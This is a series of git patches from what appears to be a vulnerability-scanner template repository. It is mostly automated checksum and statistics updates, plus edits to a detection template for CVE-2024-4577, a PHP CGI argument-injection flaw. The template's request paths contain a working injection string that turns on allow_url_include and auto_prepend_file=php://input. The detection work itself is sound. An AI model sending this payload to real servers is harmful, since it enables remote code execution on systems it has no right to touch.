ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:138675b8d347541d79d21f20674b3f8b4aa1bb61 +templates-checksum.txt:3bab1d968049d1f792c6ca18886241579f86dc29 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a18ae1104090659a552c7f293f126ca7ca6cabd2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 9 Jun 2024 15:05:30 +0000 Subject: [PATCH 0067/1841] Auto Template Signing [Sun Jun 9 15:05:30 UTC 2024] :robot: --- http/technologies/favicon-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/favicon-detect.yaml b/http/technologies/favicon-detect.yaml index 4a9488a994..351445dac1 100644 --- a/http/technologies/favicon-detect.yaml +++ b/http/technologies/favicon-detect.yaml @@ -3765,4 +3765,4 @@ http: - type: dsl dsl: - 'mmh3(base64_py(body))' -# digest: 490a0046304402202a2a418d1798a07774487359ddbdc2b6befe4a4ad186f241f08a56404d37df790220322ca8fdab4f82fabdddefaf154e22cc7e895577e6bd594f55b8d32ba215116e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205cb34f4133d517497e2ca84e04155f515599832c8140013750504b829e85835002202b05a3eeffc3f285d36aef7cd972b21d83b9307082208fb8b054639b86826a54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 272817a7d4a96ab19ce4fe0c00210d139d581e51 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 9 Jun 2024 23:10:49 +0530 Subject: [PATCH 0068/1841] minor update --- http/cves/2021/CVE-2021-38147.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/http/cves/2021/CVE-2021-38147.yaml b/http/cves/2021/CVE-2021-38147.yaml index 80e130a5a5..93dbcf3a4c 100644 --- a/http/cves/2021/CVE-2021-38147.yaml +++ b/http/cves/2021/CVE-2021-38147.yaml @@ -22,7 +22,7 @@ info: metadata: vendor: wipro product: holmes - tags: packetstorm,download,exposure,cve,cve2021 + tags: cve,cve2021,wipro,holmes,orchestrator http: - method: GET @@ -32,9 +32,11 @@ http: - "{{BaseURL}}/processexecution/DownloadExcelFile/Infrastructure_Report_Excel" - "{{BaseURL}}/processexecution/DownloadExcelFile/Resolver_Report_Excel" + stop-at-first-match: true matchers: - type: dsl dsl: - "contains(body, ' Date: Sun, 9 Jun 2024 23:17:01 +0530 Subject: [PATCH 0069/1841] fix error --- http/cves/2021/CVE-2021-38147.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2021/CVE-2021-38147.yaml b/http/cves/2021/CVE-2021-38147.yaml index 93dbcf3a4c..412cce14cd 100644 --- a/http/cves/2021/CVE-2021-38147.yaml +++ b/http/cves/2021/CVE-2021-38147.yaml @@ -37,6 +37,6 @@ http: - type: dsl dsl: - "contains(body, ' Date: Sun, 9 Jun 2024 23:26:25 +0400 Subject: [PATCH 0070/1841] Update CVE-2024-4577.yaml --- http/cves/2024/CVE-2024-4577.yaml | 52 +++++++++++++------------------ 1 file changed, 21 insertions(+), 31 deletions(-) diff --git a/http/cves/2024/CVE-2024-4577.yaml b/http/cves/2024/CVE-2024-4577.yaml index 89b8c7a511..ad0b257c6e 100644 --- a/http/cves/2024/CVE-2024-4577.yaml +++ b/http/cves/2024/CVE-2024-4577.yaml @@ -1,41 +1,31 @@ id: CVE-2024-4577 info: - name: PHP CGI Argument Injection Vulnerability - author: securityforeveryone - severity: high + name: PHP CGI - Argument Injection + author: Hüseyin TINTAŞ,sw0rk17,securityforeveryone,pdresearch + severity: critical description: | - CVE-2024-4577 is a critical vulnerability in PHP affecting CGI configurations, allowing attackers to execute arbitrary commands via crafted URL parameters. - reference: - - https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/?123 - - https://github.com/TAM-K592/CVE-2024-4577/tree/main - tags: rce,php,cgi,cve2024,cve + Detects PHP CGI Argument Injection vulnerability + impact: | + Successful exploitation could lead to remote code execution on the affected system. + remediation: | + Apply the vendor-supplied patches or upgrade to a non-vulnerable version. + tags: cve,cve2024,php,cgi,rce -http: - - raw: - - | - POST /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded +requests: + - method: POST + path: + - "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" + - "{{BaseURL}}/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" + - "{{BaseURL}}/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" + - "{{BaseURL}}/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" - + body: | + - - | - POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - - - matchers-condition: and + stop-at-first-match: true matchers: - type: word + part: body words: - - "index of" - - "directory" - - "vulnerable" - condition: or - - - type: status - status: - - 200 + - "3f2ba4ab3b260f4c2dc61a6fac7c3e8a" From 08c981fe7f90434520e4b91fdccad063536fc11e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 9 Jun 2024 23:27:20 +0400 Subject: [PATCH 0071/1841] Update CVE-2024-4577.yaml --- http/cves/2024/CVE-2024-4577.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-4577.yaml b/http/cves/2024/CVE-2024-4577.yaml index ad0b257c6e..e07e808959 100644 --- a/http/cves/2024/CVE-2024-4577.yaml +++ b/http/cves/2024/CVE-2024-4577.yaml @@ -10,6 +10,8 @@ info: Successful exploitation could lead to remote code execution on the affected system. remediation: | Apply the vendor-supplied patches or upgrade to a non-vulnerable version. + metadata: + verified: true tags: cve,cve2024,php,cgi,rce requests: From 14a5c9bf8a94fd720d413577e37e779605b5095c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 9 Jun 2024 23:40:14 +0400 Subject: [PATCH 0072/1841] updated description --- http/cves/2024/CVE-2024-4577.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-4577.yaml b/http/cves/2024/CVE-2024-4577.yaml index e07e808959..074e2a0ed9 100644 --- a/http/cves/2024/CVE-2024-4577.yaml +++ b/http/cves/2024/CVE-2024-4577.yaml @@ -5,7 +5,7 @@ info: author: Hüseyin TINTAŞ,sw0rk17,securityforeveryone,pdresearch severity: critical description: | - Detects PHP CGI Argument Injection vulnerability + PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP. impact: | Successful exploitation could lead to remote code execution on the affected system. remediation: | From b106cfbda1c46525291648fb6396e06275f57b0d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 9 Jun 2024 19:43:29 +0000 Subject: [PATCH 0073/1841] Auto Generated New Template Addition List [Sun Jun 9 19:43:29 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e69de29bb2..570f70033f 100644 --- a/.new-additions +++ b/.new-additions @@ -0,0 +1 @@ +http/cves/2024/CVE-2024-4577.yaml From da0cf9f69dc331cbfac0c2c4ba2789f1597a1ed8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 9 Jun 2024 19:43:39 +0000 Subject: [PATCH 0074/1841] Auto Generated Templates Checksum [Sun Jun 9 19:43:39 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 46e77c46b8..0aa1b35c0d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3321,6 +3321,7 @@ http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 http/cves/2024/CVE-2024-4358.yaml:9c130ef94d82e026679e80b4fcd1d544991528e8 +http/cves/2024/CVE-2024-4577.yaml:230820732773ca2a64154da53ae0cfd01d44c11c http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 @@ -6798,7 +6799,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872 http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a -http/technologies/favicon-detect.yaml:dac4eb2a45804f38bf1f8089cbe0463934d72599 +http/technologies/favicon-detect.yaml:e356f0d48520e09aceb1bda90f54a41e8a5492fa http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/gabia-server-detect.yaml:194d560530bd2f19ab14523319f46dd7ef3757d8 @@ -8632,7 +8633,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3bab1d968049d1f792c6ca18886241579f86dc29 +templates-checksum.txt:4882c30a41c3f47191461b5a66745415074fda50 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b378d7f25b7231e3089f5f6cf6034423ac049581 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 9 Jun 2024 19:44:12 +0000 Subject: [PATCH 0075/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 37f01c16d6..96299453af 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'http/cves/2024/CVE-2024-4577.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From f78b5d86c10ee0f1fb08d43cb0148f9e1c6ad69e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 9 Jun 2024 23:45:25 +0400 Subject: [PATCH 0076/1841] Update CVE-2024-4577.yaml --- http/cves/2024/CVE-2024-4577.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-4577.yaml b/http/cves/2024/CVE-2024-4577.yaml index 074e2a0ed9..b87aa67c73 100644 --- a/http/cves/2024/CVE-2024-4577.yaml +++ b/http/cves/2024/CVE-2024-4577.yaml @@ -14,7 +14,7 @@ info: verified: true tags: cve,cve2024,php,cgi,rce -requests: +http: - method: POST path: - "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" From 78bf5bbfb566635bf51139750e14b0618ff2e612 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 9 Jun 2024 19:45:30 +0000 Subject: [PATCH 0077/1841] Auto Template Signing [Sun Jun 9 19:45:30 UTC 2024] :robot: --- http/cves/2024/CVE-2024-4577.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-4577.yaml b/http/cves/2024/CVE-2024-4577.yaml index b87aa67c73..c8644791dc 100644 --- a/http/cves/2024/CVE-2024-4577.yaml +++ b/http/cves/2024/CVE-2024-4577.yaml @@ -31,3 +31,4 @@ http: part: body words: - "3f2ba4ab3b260f4c2dc61a6fac7c3e8a" +# digest: 4a0a0047304502202f2c58605604d971b9179343f2f392f5b017faff6fc579a6174baa96cc2bccdd0221008d95bd2cfed96674e0cb86a73bcb16796d8d5a4910d661d7d088a5b4c14adec7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e616276beb2faa4f40065862193d3a039bef3a23 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 9 Jun 2024 19:45:53 +0000 Subject: [PATCH 0079/1841] Auto Generated Templates Checksum [Sun Jun 9 19:45:53 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0aa1b35c0d..16332ee3b1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3321,7 +3321,7 @@ http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 http/cves/2024/CVE-2024-4358.yaml:9c130ef94d82e026679e80b4fcd1d544991528e8 -http/cves/2024/CVE-2024-4577.yaml:230820732773ca2a64154da53ae0cfd01d44c11c +http/cves/2024/CVE-2024-4577.yaml:7c1c1f4928d95b4456a8ee14fbaa4d810bbe5bc4 http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 @@ -8633,7 +8633,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4882c30a41c3f47191461b5a66745415074fda50 +templates-checksum.txt:9205018ec81e36734a66ab900241a9e4fc233acb wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 71888ff00b41bb44acc529ca068f533135fbcf5f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 9 Jun 2024 19:54:40 +0000 Subject: [PATCH 0080/1841] Auto Generated Templates Stats [Sun Jun 9 19:54:40 UTC 2024] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 10856 ++++++++++++++++++++--------------------- TOP-10.md | 6 +- 3 files changed, 5432 insertions(+), 5432 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 09fcbab624..178daf2c21 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":2510},{"name":"panel","count":1157},{"name":"wordpress","count":983},{"name":"exposure","count":948},{"name":"xss","count":911},{"name":"wp-plugin","count":852},{"name":"osint","count":804},{"name":"tech","count":686},{"name":"lfi","count":662},{"name":"misconfig","count":659},{"name":"edb","count":599},{"name":"rce","count":599},{"name":"packetstorm","count":544},{"name":"wpscan","count":502},{"name":"cve2021","count":491},{"name":"cve2022","count":479},{"name":"wp","count":426},{"name":"cve2023","count":380},{"name":"unauth","count":367},{"name":"sqli","count":364},{"name":"file","count":346},{"name":"authenticated","count":343},{"name":"intrusive","count":302},{"name":"detect","count":295},{"name":"login","count":284},{"name":"kev","count":275},{"name":"cve2020","count":257},{"name":"token-spray","count":243},{"name":"oast","count":222},{"name":"config","count":221},{"name":"default-login","count":216},{"name":"top-200","count":215},{"name":"osint-social","count":210},{"name":"network","count":195},{"name":"token","count":193},{"name":"apache","count":191},{"name":"","count":191},{"name":"devops","count":177},{"name":"cve2018","count":170},{"name":"iot","count":167},{"name":"cve2019","count":164},{"name":"keys","count":156},{"name":"joomla","count":148},{"name":"install","count":147},{"name":"malware","count":142},{"name":"tcp","count":136},{"name":"redirect","count":135},{"name":"cloud","count":134},{"name":"aws","count":134},{"name":"auth-bypass","count":133},{"name":"ssrf","count":119},{"name":"phishing","count":117},{"name":"amazon","count":117},{"name":"cms","count":113},{"name":"files","count":113},{"name":"cve2010","count":112},{"name":"cve2017","count":110},{"name":"router","count":108},{"name":"top-100","count":100},{"name":"aws-cloud-config","count":90},{"name":"disclosure","count":89},{"name":"linux","count":85},{"name":"code","count":81},{"name":"cve2024","count":80},{"name":"local","count":80},{"name":"privesc","count":79},{"name":"seclists","count":79},{"name":"takeover","count":79},{"name":"tokens","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":73},{"name":"oss","count":68},{"name":"cisco","count":67},{"name":"js","count":67},{"name":"enum","count":65},{"name":"adobe","count":63},{"name":"ir","count":61},{"name":"huntr","count":60},{"name":"atlassian","count":59},{"name":"cve2015","count":59},{"name":"cve2016","count":57},{"name":"vmware","count":56},{"name":"detection","count":56},{"name":"google","count":56},{"name":"c2","count":55},{"name":"tenable","count":48},{"name":"logs","count":48},{"name":"log4j","count":47},{"name":"vulhub","count":46},{"name":"hackerone","count":46},{"name":"osint-gaming","count":45},{"name":"aem","count":45},{"name":"cve2014","count":44},{"name":"jndi","count":44},{"name":"debug","count":44},{"name":"php","count":44},{"name":"generic","count":43},{"name":"deserialization","count":43},{"name":"oa","count":42},{"name":"traversal","count":42},{"name":"osint-hobby","count":42},{"name":"plugin","count":42},{"name":"microsoft","count":42},{"name":"osint-porn","count":42},{"name":"springboot","count":41},{"name":"cnvd","count":41},{"name":"misc","count":40},{"name":"injection","count":38},{"name":"miscellaneous","count":38},{"name":"jira","count":37},{"name":"listing","count":37},{"name":"kubernetes","count":37},{"name":"ibm","count":36},{"name":"cti","count":36},{"name":"osint-misc","count":35},{"name":"sap","count":34},{"name":"fuzz","count":34},{"name":"ssl","count":33},{"name":"tls","count":32},{"name":"osint-tech","count":31},{"name":"dlink","count":30},{"name":"wp-theme","count":30},{"name":"osint-coding","count":30},{"name":"ec2","count":30},{"name":"api","count":28},{"name":"k8s","count":28},{"name":"fortinet","count":28},{"name":"gitlab","count":28},{"name":"proxy","count":27},{"name":"dns","count":27},{"name":"citrix","count":27},{"name":"bestwebsoft","count":27},{"name":"cve2012","count":26},{"name":"zohocorp","count":26},{"name":"firewall","count":26},{"name":"ssh","count":26},{"name":"lfr","count":26},{"name":"weaver","count":25},{"name":"manageengine","count":25},{"name":"osint-finance","count":24},{"name":"osint-images","count":24},{"name":"zoho","count":24},{"name":"admin","count":24},{"name":"osint-business","count":24},{"name":"osint-shopping","count":24},{"name":"file-upload","count":23},{"name":"audit","count":23},{"name":"xxe","count":23},{"name":"tomcat","count":23},{"name":"stored-xss","count":23},{"name":"yonyou","count":23},{"name":"prestashop","count":22},{"name":"github","count":22},{"name":"s3","count":22},{"name":"cicd","count":22},{"name":"printer","count":21},{"name":"ecology","count":21},{"name":"dast","count":21},{"name":"msf","count":21},{"name":"weblogic","count":21},{"name":"ftp","count":20},{"name":"camera","count":20},{"name":"jenkins","count":20},{"name":"confluence","count":19},{"name":"wavlink","count":19},{"name":"grafana","count":19},{"name":"hp","count":19},{"name":"struts","count":19},{"name":"rukovoditel","count":19},{"name":"android","count":18},{"name":"ruijie","count":18},{"name":"node.js","count":18},{"name":"osint-music","count":18},{"name":"cve2011","count":18},{"name":"vpn","count":18},{"name":"coldfusion","count":18},{"name":"azure","count":17},{"name":"microweber","count":17},{"name":"mail","count":17},{"name":"honeypot","count":17},{"name":"headless","count":17},{"name":"nginx","count":17},{"name":"cve2009","count":16},{"name":"osint-blog","count":16},{"name":"status","count":16},{"name":"service","count":16},{"name":"backup","count":16},{"name":"jarm","count":16},{"name":"alibaba","count":16},{"name":"magento","count":16},{"name":"rconfig","count":16},{"name":"backdoor","count":16},{"name":"netgear","count":15},{"name":"moosocial","count":15},{"name":"zyxel","count":15},{"name":"dashboard","count":15},{"name":"seeyon","count":15},{"name":"nodejs","count":15},{"name":"tongda","count":15},{"name":"installer","count":15},{"name":"setup","count":15},{"name":"java","count":15},{"name":"cve2008","count":15},{"name":"nagios","count":15},{"name":"bypass","count":15},{"name":"woocommerce","count":15},{"name":"redhat","count":15},{"name":"cnvd2021","count":15},{"name":"ruby","count":15},{"name":"ssti","count":15},{"name":"cve2013","count":15},{"name":"dell","count":14},{"name":"osint-art","count":14},{"name":"docker","count":14},{"name":"osint-health","count":14},{"name":"smtp","count":14},{"name":"jboss","count":14},{"name":"redis","count":14},{"name":"creds-stuffing","count":14},{"name":"rds","count":14},{"name":"icewarp","count":14},{"name":"npm","count":14},{"name":"login-check","count":14},{"name":"auth","count":14},{"name":"node","count":14},{"name":"domainmod","count":14},{"name":"info-leak","count":14},{"name":"git","count":14},{"name":"ivanti","count":14},{"name":"fortigate","count":13},{"name":"hashicorp","count":13},{"name":"mysql","count":13},{"name":"postgresql","count":13},{"name":"graphql","count":13},{"name":"cuppacms","count":13},{"name":"abstractapi","count":13},{"name":"laravel","count":13},{"name":"airflow","count":13},{"name":"sonicwall","count":13},{"name":"windows","count":13},{"name":"cuppa","count":13},{"name":"rails","count":13},{"name":"fuzzing","count":13},{"name":"osint-dating","count":13},{"name":"osint-political","count":13},{"name":"webserver","count":12},{"name":"jetbrains","count":12},{"name":"vbulletin","count":12},{"name":"kafka","count":12},{"name":"zimbra","count":12},{"name":"newrelic","count":12},{"name":"smb","count":12},{"name":"phpgurukul","count":12},{"name":"doppler","count":12},{"name":"netsweeper","count":12},{"name":"ofbiz","count":12},{"name":"drupal","count":12},{"name":"cache","count":11},{"name":"prometheus","count":11},{"name":"iis","count":11},{"name":"iam","count":11},{"name":"online_fire_reporting_system_project","count":11},{"name":"phpmyadmin","count":11},{"name":"jolokia","count":11},{"name":"xstream","count":11},{"name":"online-fire-reporting","count":11},{"name":"spring","count":11},{"name":"fastjson","count":11},{"name":"django","count":11},{"name":"hikvision","count":11},{"name":"osint-video","count":11},{"name":"glpi","count":11},{"name":"dedecms","count":11},{"name":"sitecore","count":10},{"name":"zabbix","count":10},{"name":"dahua","count":10},{"name":"crlf","count":10},{"name":"symfony","count":10},{"name":"solr","count":10},{"name":"thinkphp","count":10},{"name":"progress","count":10},{"name":"samsung","count":10},{"name":"solarview","count":10},{"name":"dropbox","count":10},{"name":"elasticsearch","count":10},{"name":"digitalocean","count":10},{"name":"db","count":10},{"name":"xstream_project","count":10},{"name":"elastic","count":9},{"name":"pfsense","count":9},{"name":"blind","count":9},{"name":"artica","count":9},{"name":"firebase","count":9},{"name":"gateway","count":9},{"name":"opencats","count":9},{"name":"python","count":9},{"name":"cnvd2020","count":9},{"name":"sophos","count":9},{"name":"druid","count":9},{"name":"scada","count":9},{"name":"sangfor","count":9},{"name":"wso2","count":9},{"name":"lucee","count":9},{"name":"vcenter","count":9},{"name":"gitea","count":9},{"name":"facebook","count":9},{"name":"cloudtrail","count":9},{"name":"f5","count":9},{"name":"joomla\\!","count":9},{"name":"console","count":9},{"name":"bitbucket","count":9},{"name":"versa","count":9},{"name":"moodle","count":9},{"name":"exchange","count":9},{"name":"secret","count":9},{"name":"kube","count":9},{"name":"nexus","count":8},{"name":"mirai","count":8},{"name":"emerge","count":8},{"name":"odoo","count":8},{"name":"atom","count":8},{"name":"symantec","count":8},{"name":"default-page","count":8},{"name":"spotweb_project","count":8},{"name":"instrusive","count":8},{"name":"cisco-switch","count":8},{"name":"hms","count":8},{"name":"microfocus","count":8},{"name":"go","count":8},{"name":"mlflow","count":8},{"name":"exploitdb","count":8},{"name":"error","count":8},{"name":"huawei","count":8},{"name":"metadata","count":8},{"name":"phpinfo","count":8},{"name":"e-office","count":8},{"name":"wanhu","count":8},{"name":"spotweb","count":8},{"name":"bucket","count":8},{"name":"unauthenticated","count":8},{"name":"cloud-enum","count":8},{"name":"ognl","count":8},{"name":"openemr","count":8},{"name":"nagiosxi","count":8},{"name":"phpjabbers","count":8},{"name":"lfprojects","count":8},{"name":"osint-news","count":8},{"name":"recon","count":8},{"name":"config-audit","count":8},{"name":"manager","count":8},{"name":"oauth","count":8},{"name":"discord","count":8},{"name":"car_rental_management_system_project","count":7},{"name":"websphere","count":7},{"name":"oos","count":7},{"name":"mobileiron","count":7},{"name":"slack","count":7},{"name":"nacos","count":7},{"name":"gogs","count":7},{"name":"teamcity","count":7},{"name":"telesquare","count":7},{"name":"squirrelmail","count":7},{"name":"nortekcontrol","count":7},{"name":"bigip","count":7},{"name":"keking","count":7},{"name":"cacti","count":7},{"name":"maps","count":7},{"name":"linkedin","count":7},{"name":"landray","count":7},{"name":"activemq","count":7},{"name":"vms","count":7},{"name":"pmb","count":7},{"name":"shopify","count":7},{"name":"bloofox","count":7},{"name":"opensis","count":7},{"name":"avtech","count":7},{"name":"database","count":7},{"name":"fpd","count":7},{"name":"moodating","count":7},{"name":"blockchain","count":7},{"name":"fortios","count":7},{"name":"ruckus","count":7},{"name":"monstra","count":7},{"name":"twitter","count":7},{"name":"vpc","count":7},{"name":"contec","count":7},{"name":"mongodb","count":7},{"name":"rfi","count":7},{"name":"solarwinds","count":7},{"name":"vrealize","count":7},{"name":"filemanager","count":7},{"name":"sonarqube","count":6},{"name":"microstrategy","count":6},{"name":"jeecg","count":6},{"name":"ldap","count":6},{"name":"splunk","count":6},{"name":"cockpit","count":6},{"name":"paloaltonetworks","count":6},{"name":"openvpn","count":6},{"name":"kubelet","count":6},{"name":"leak","count":6},{"name":"sql","count":6},{"name":"synacor","count":6},{"name":"paypal","count":6},{"name":"magmi","count":6},{"name":"asus","count":6},{"name":"gcp","count":6},{"name":"beyondtrust","count":6},{"name":"elfinder","count":6},{"name":"doctor_appointment_system_project","count":6},{"name":"plesk","count":6},{"name":"74cms","count":6},{"name":"keycloak","count":6},{"name":"jamf","count":6},{"name":"couchdb","count":6},{"name":"flutterwave","count":6},{"name":"server","count":6},{"name":"express","count":6},{"name":"webmin","count":6},{"name":"asp","count":6},{"name":"servicenow","count":6},{"name":"liferay","count":6},{"name":"chanjet","count":6},{"name":"minio","count":6},{"name":"bmc","count":6},{"name":"advantech","count":6},{"name":"zhiyuan","count":6},{"name":"typo3","count":6},{"name":"geoserver","count":6},{"name":"jetty","count":6},{"name":"tikiwiki","count":6},{"name":"cobbler","count":6},{"name":"rat","count":6},{"name":"doctor-appointment-system","count":6},{"name":"log","count":6},{"name":"digitaldruid","count":5},{"name":"10web","count":5},{"name":"cloudflare","count":5},{"name":"totolink","count":5},{"name":"open-emr","count":5},{"name":"openfire","count":5},{"name":"decision-center","count":5},{"name":"adminer","count":5},{"name":"circarlife","count":5},{"name":"tenda","count":5},{"name":"ems","count":5},{"name":"telerik","count":5},{"name":"froxlor","count":5},{"name":"react","count":5},{"name":"graylog","count":5},{"name":"pyload","count":5},{"name":"wbce","count":5},{"name":"axigen","count":5},{"name":"cdata","count":5},{"name":"storage","count":5},{"name":"gocd","count":5},{"name":"awstats","count":5},{"name":"hpe","count":5},{"name":"mssql","count":5},{"name":"jwt","count":5},{"name":"carrental","count":5},{"name":"acm","count":5},{"name":"papercut","count":5},{"name":"agentejo","count":5},{"name":"jabber","count":5},{"name":"qnap","count":5},{"name":"asana","count":5},{"name":"sentry","count":5},{"name":"xmlrpc","count":5},{"name":"webkul","count":5},{"name":"percha","count":5},{"name":"rseenet","count":5},{"name":"hybris","count":5},{"name":"qdpm","count":5},{"name":"thedigitalcraft","count":5},{"name":"magmi_project","count":5},{"name":"metinfo","count":5},{"name":"gnu","count":5},{"name":"firmware","count":5},{"name":"vehicle_service_management_system_project","count":5},{"name":"fatpipe","count":5},{"name":"nuuo","count":5},{"name":"web3","count":5},{"name":"voip","count":5},{"name":"sysaid","count":5},{"name":"adb","count":5},{"name":"cnvd2023","count":5},{"name":"chamilo","count":5},{"name":"parallels","count":5},{"name":"caucho","count":5},{"name":"mikrotik","count":5},{"name":"sftp","count":5},{"name":"genetechsolutions","count":5},{"name":"strapi","count":5},{"name":"apisix","count":5},{"name":"connectwise","count":5},{"name":"tibco","count":5},{"name":"matrix","count":5},{"name":"redmine","count":5},{"name":"openai","count":5},{"name":"schneider-electric","count":5},{"name":"avaya","count":5},{"name":"crushftp","count":5},{"name":"terramaster","count":5},{"name":"zzzcms","count":5},{